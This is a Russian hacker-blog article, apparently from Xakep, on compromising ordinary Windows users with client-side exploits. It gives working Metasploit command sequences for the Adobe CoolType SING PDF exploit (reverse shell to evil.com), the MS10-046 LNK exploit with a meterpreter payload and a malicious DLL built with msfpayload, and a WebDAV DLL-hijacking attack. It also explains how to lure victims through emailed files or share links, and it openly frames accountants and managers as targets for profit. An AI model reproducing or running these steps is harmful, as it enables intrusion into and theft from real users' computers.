Новичку полезно

  • А знаете ли вы что?

    - тот кто на каждом углу говорит что он является хакером, на самом деле является клоуном?


Атакуем простых юзеров, используя client-side-сплойты

Теги: MSF, Metasploit, Adobe, PDF, exploit, эксплойт
источник

Компьютеры теперь везде и вся. Несчастных юзеров полным-полно. Почему несчастных? Да потому что во многом они стали основной целью для «хакерских атак» :). Особенно с развитием всяких систем переводов, интернет-банкинга и других видов электронных денег. Теперь снять профит с обычного юзера – не проблема. И это уже не считая классики типа спама, ботнетов, DoS’ов, кражи конфиденциально информации. Антивирусы, фаеры, IDS’ы, системы обновления ПО, сэндбоксы спасают только небольшую толпу продвинутых юзеров/фирм, так как их надо и настроить, и правильно реагировать на угрозы, и купить само ПО. В итоге имеем широкий выбор из миллионов менеджеров/бухгалтеров для «работы» с ними :).

А тут еще и реально критические уязвимости от таких контор, как Microsoft и Adobe, чье ПО является де-факто стандартом по миру. Да, в этом смысле лето было богатым!
В качестве примера я приведу три сплоита: Adobe Acrobat PDF Cooltype Sing (версии

Как ни странно, все примеры реализованы с помощью Metasploit Framework. Тут надо отдать должное создателям MSF – они чрезвычайно быстро стали добавлять сплоиты к самым массовым критическим уязвимостям. Некоторые реализации уязвимостей и вовсе появляются сразу в MSF, без сторонних PoC’ов. Все три перечисленные уязвимости были 0-day, когда попали в MSF. Сейчас уже есть кое-какие патчи, но вернемся к делу.

1) Adobe Acrobat PDF Cooltype Sing. Adobe этим летом дал миру несколько суровых дыр. Это одна из них. Заходим в msfconsole и:

Выбираем сплоит:

msf > use exploit/windows/fileformat/adobe_cooltype_sing

Задаем имя файла:

msf > set FILENAME xakep_ubileinyi_vypusk.pdf

Куда сохраняем? В home:

msf > set OUTPUTPATH ~

Выбираем нагрузку и ее настройки:

msf > set PAYLOAD windows/shell/reverse_tcp
msf > set LHOST evil.com
msf > set LPORT 80

Теперь на наш evil.com вешаем netcat, например, и посылаем жертве файлик по почте. Простой реверсовый шелл нужен, во-первых, чтобы обойти NAT, файер, а во-вторых, чтобы не привязываться к процессу (чтобы соединение не оборвалось при закрытии Acrobat Reader’а).

Есть аналогичный сплоит, но проводящий атаку через браузер и Adobe’овский плагин к нему – exploit/windows/browser/adobe_cooltype_sing.

2) MS LNK сплоит (MS10-046). Сплоит из разряда фич :)

Выбираем сплоит:

msf >use windows/browser/ms10_046_shortcut_icon_dllloader

Настраиваем пэйлоад:

msf >set PAYLOAD windows/meterpreter/reverse_tcp
msf >set LHOST 192.168.0.101

По сути, сплоит поднимает WebDAV и кидает туда ярлыки. В результате либо даем бедному пользователю полученную ссылку, либо делаем ярлычок на ресурс. То есть сплоит из локального стал удаленным (через шару и WebDAV). Павним бедного юзера – ему вряд ли что-то поможет :). Злую DLL’ку для этого и следующего сплоита можно создать и ручками. Ярлычок, понятное дело, тоже.

$msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 D > evil.dll

Где

  • windows/meterpreter/reverse_tcp – название нагрузки,
  • LHOST=192.168.0.101 – настройки
  • D – указываем, что создаем DLL’ку;
  • evil.dll – имя итогового файла.

3) MS DLL Hijacking

Это очень забавная вещь! С ее помощью мы фактически можем «превратить» любой миролюбивый формат файла во что-то злое. Пришлют тебе файлы с какой-нибудь презентацией или чертежами AutoCAD’а, например. А среди них какая-то библиотечка валяется. Бывает ведь. Ты, конечно же, запустишь сам чертеж, а тут – бац! – и у тебя бэкдор. Хорошее дело!
Подробное описание «почему и зачем так» смотри на следующей странице у Алексея Синцова :).

А теперь – немного практики.

Выбираем сплоит:

msf > use windows/browser/webdav_dll_hijacker

Задаем имя файлов:

msf > set BASENAME policy 

Задаем расширение файла:

msf > set EXTENSIONS ppt 

Имя для шары:

 msf > set SHARENAME docs 

Нагрузка:

 msf > set PAYLOAD windows/meterpreter/bind_tcp 

После этого либо впариваем жертве ссылку на шару – \\192.168.0.101\docs\, либо на HTTP-сервак – http://192.168.0.101:80. Жертва открывает файлик – мы получаем шелл. Честный обмен :).

Опять же, по сути, локальная уязвимость превратилась в удаленную за счет шары и WebDAV. Вот такими тремя client-site багами мы можем положить на лопатки все версии Windows, от XP до 7. Антивири и файеры – тоже не помеха при небольших доработках методов :).

Добавить комментарий


Обновить